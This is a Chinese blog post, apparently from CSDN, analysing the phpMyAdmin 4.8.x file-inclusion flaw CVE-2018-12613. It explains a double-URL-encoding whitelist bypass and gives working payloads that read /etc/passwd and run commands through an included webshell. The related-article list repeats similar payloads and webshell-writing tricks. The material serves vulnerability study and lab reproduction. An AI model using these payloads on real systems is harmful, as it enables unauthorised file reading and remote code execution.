【漏洞分析】CVE-2018-12613 phpmyadmin4.8.x漏洞

最新推荐文章于 2024-08-03 17:29:20 发布
最新推荐文章于 2024-08-03 17:29:20 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞分析 文章标签: 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xia739635297/article/details/104579112
版权

此时无序胜有序.

漏洞信息

An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).

即,影响范围为phpmyadmin 4.8.2之前的4.8版本.可达到的效果是LFI和RCE.

漏洞分析与利用

先分析代码.定位到漏洞文件(index.php),漏洞代码55行到63行.

通过if判断即可包含target指定的文件.

55行到60行对可控参数target进行了限制.

1.target必须是string

2.target不可为index开头的文件

3.target不能是黑名单中的文件

4.checkPageValidity方法过滤.

黑名单如下

 前三个限制很简单,着重看第四个限制.

跟进到checkPageValidity方法.

 分析后可知.

1.未给定白名单whitelist时,默认whitelist为$goto_whitelist

2.未给定$page参数或者$page参数不是字符串,返回false

3.$page在白名单中,返回true

4.$page去参数后的结果在白名单中(将$page以?为限进行截取后附给$_page,再判断$_page是否在白名单中),返回true

5.将$page进行一次urldecode后,再进行第四步的操作

6.上述条件都不满足,直接返回false

默认白名单如下

只要能使checkPageValidity返回true就可以进行LFI.

已知whitelist_file.php,whitelist_file.php?a=123&b=456可以通过checkPageValidity校验

 checkPageValidity 465行的urldecode可以利用

 由465行的urldecode的存在,我们可以将一个问号进行两次urlencode变成%25%33%66,在发送请求之时,浏览器会自动解码一次问号则变成了%3f,在经过465行的解码后问号还原,这时我们也就可以达到控制截取内容的效果.

LFI

由上面的分析我们可以构造payload如下

whitelist_file.php + 二次urlencode(?) + 要读取的文件
例如:
db_datadict.php%25%33%66../../../../../../../etc/passwd
此时include的便是
include "db_datadict.php%3f../../../../../../../etc/passwd"
成功包含的文件便是/etc/passwd

成功读取.

RCE

利用上面的LFI包含一个shell文件即可get webshell.

构造一句话,

 

 看看数据库文件.一句话在里面.

 文件包含该文件.即可命令执行.

因为我是用vulhub搭的环境,mysql与phpmyadmin不在一个容器里,所以不能包含.这个数据库文件.命令执行payload理应如下:

http://127.0.0.1:8087/index.php?cmd=phpinfo();&target=db_datadict.php%25%33%66../../mysql/test/4ut15m.frm

当然,重要的是需要知道数据库文件的路径.

贴出上面用到的代码

<?php
/**
 *filename:check.php
 */
$a = "whitelist_file.php";
$b = "whitelist_file.php?a=123&b=456";
echo "$a 截取后:为".mb_substr($a,0,mb_strpos($a.'?','?'));
echo "\n$b 截取后为:".mb_substr($b,0,mb_strpos($b.'?','?'))."\n";

?>
<?php
/**
 *filename:filter.php
 */
function checkPageValidity(&$page, array $whitelist = [])
{
        if (empty($whitelist)) {
            $whitelist = array('db_datadict.php','db_sql.php','db_events.php');
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        echo "这是我们传入的字符串:$page,它即将进行白名单值判断<br>";

        if (in_array($page, $whitelist)) {
            return true;
        }
        
        echo "但很明显它并不是白名单中的值,所以程序继续往下执行<br>"; 
        
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
    
        echo "这是第一次截取后的内容:$_page,它也将进行白名单值判断<br>";
        if (in_array($_page, $whitelist)) {
            return true;
        }
    
        echo "因为截取后的内容同样无法通过白名单检验,所以程序继续往下判断<br>";
        echo "下面会进行一次urldecode<br>";
    
        $_page = urldecode($page);
        echo "这是解码后的内容:$_page,它将进行一次截取操作(去参数)<br>";
    
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
       
        echo "这是第二次截取后的内容:$_page,你看,这个结果可以通过白名单检验<br>";
        if (in_array($_page, $whitelist)) {
            return true;
        }
        

        return false;
    }
checkPageValidity($_GET['a']);

?>

 

丶4ut15m
关注
专栏目录
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 686
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-126134.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
[网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含缺陷复现及防御措施(CVE-2018-12613
杨秀璋的专栏
01-16 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文通过两个题目分享了DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理,再到漏洞复现进行讲解,更重要的是让大家了解这些真实漏洞背后的知识。基础性文章,希望对您有所帮助!
本地文件包含漏洞--phpMyAdmin 4.8.0-4.8.1
weixin_44940180的博客
08-19 249
安装phpmyadmin-4.8.1版本 执行查询select “<?php phpinfo();?>” 访问 http://127.0.0.1/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../../../tmp/tmp/sess_21nas46tilu36fqm0qsdin3rp9p01kq6 %25=% %3f=? sess_21nas46tilu36fqm0qsdin3rp9p01kq6是保.
CVE漏洞 phpmyadmin 4.81初识
h0ld1rs的博客
10-28 369
文章目录CVE漏洞漏洞体现漏洞利用漏洞原理 CVE CVE 的英文全称是“Common Vulnerabilities & Exposures”通用漏洞披露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字,可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据,虽然这些工具很难整合在一起。这样就使得CVE成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的
PhPMyadmin-漏洞复现
最新发布
Jz031212的博客
08-03 213
2.因为extensions同级目录下有www文件存放网站,所以我们猜测网站路径在D:\phpstudy_pro\WWW,使用into outfile将一句话木马写入别的目录下。4.在输入 set global general_log_file = '你要将日志保存的路径' 将日志文件路径设置好,点击执行。5.我们在sql框内输入select 123123 后执行,在刚刚的路径内找到我们的日志文件,可以找到我们刚才输入的指令。4.使用中国蚁剑将网址和木马内的密码输入,测试连接,成功即代表注入成功。
phpMyAdmin 漏洞小集合
SoulCat
08-07 5607
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734)+4.8.1 远程文件包含漏洞CVE-2018-12613) 有情有义又是无米之炊,无情无义却是饕餮盛宴. 远程代码执行漏洞CVE-2016-5734) phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修...
复现PHPMyAdminCVE-2018-12613漏洞,并利用漏洞实现上传WebShell
qq_54713392的博客
04-20 648
复现PHPMyAdminCVE-2018-12613漏洞 并利用漏洞实现上传WebShell 漏洞描述:   在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者
phpMyAdmin 4.8.0~4.8.3 Transformation 任意文件包含/远程代码执行漏洞
weixin_33908217的博客
12-15 324
本文转载自:phpMyAdmin 4.8.0~4.8.3 Transformation 任意文件包含/远程代码执行漏洞 (需登录/PMASA-2018-6/CVE-2018-19968) | VULNSPY 2018年12月07日 phpMyAdmin 发布安全公告PMASA-2018-6修复了一个由Transformation特性引起的本地文件读取漏洞...
漏洞复现】phpmyadmin后台任意文件包含(CVE-2018-12613
野原新之助
09-29 799
由于对index.php中包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。
phpmyadmin 4.8.1漏洞复现(实战演示)
weixin_49071539的博客
12-21 1689
第一步,根据该版本CVE漏洞构造URL,在index.php后添加内容,如显示/etc/passwd详细内容。 /* 方法一 */ http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd /* 方法二 */ http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../.
PhpMyAdmin文件包含漏洞
weixin_43622525的博客
02-28 1757
目录 漏洞描述 漏洞复现 复现 解决方法 漏洞描述 PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。 在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。 受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613漏洞复现
phpMyAdmin后台文件包含分析溯源(CVE-2018-12613)--墨者学院
小白鸽
08-03 768
01 背景介绍 phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 02 影响版本 phpMyAdmin 4.8.0和4.8.1 03 利用方式 1.写phpinfo文件,利用文件包含,查看绝对路径, select '<?php phpinfo()?>' 2.写小马 select '<?ph
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
Senimo
12-11 1685
漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP:phpMyAdmin 4.8.1 CVECVE-2018-12613 类型:远程文件包含 下载phpMyAdmin 4.8.1源码 漏洞问题出现在index.php页面55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 985
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
Mac中phpMyAdmin4.8.2配置MySQL8问题及解决方法
a051230508的博客
06-28 1234
1. phpmyadmin Server sent charset (255) unknown to the client. 字符集问题,需修改mysql字符集为utf8。a. 进入/etc文件夹,编辑my.cnf文件cd /etcsudo vim my.cnfb. my.cnf中插入如下内容(也可以用sublime等文本编辑器编辑):# Example MySQL config file for...
fedora mysql 漏洞修复_phpMyAdmin 4.8.5 发布,修复任意文件读取和SQL注入漏洞
weixin_42524004的博客
01-19 732
phpMyAdmin 4.8.5 已经发布,phpMyAdmin是一个用PHP编写的免费软件工具,用于处理MySQL或MariaDB数据库服务器的管理。您可以使用phpMyAdmin执行大多数管理任务,包括创建数据库,运行查询和添加用户帐户。phpMyAdmin 4.8.5以修复两个严重的安全漏洞安全漏洞如下:CVE-2019-6799:任意文件读取漏洞4.8.5之前的phpMyAdmin中发...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5970
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞PHPMyAdmin是一个广受欢迎的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值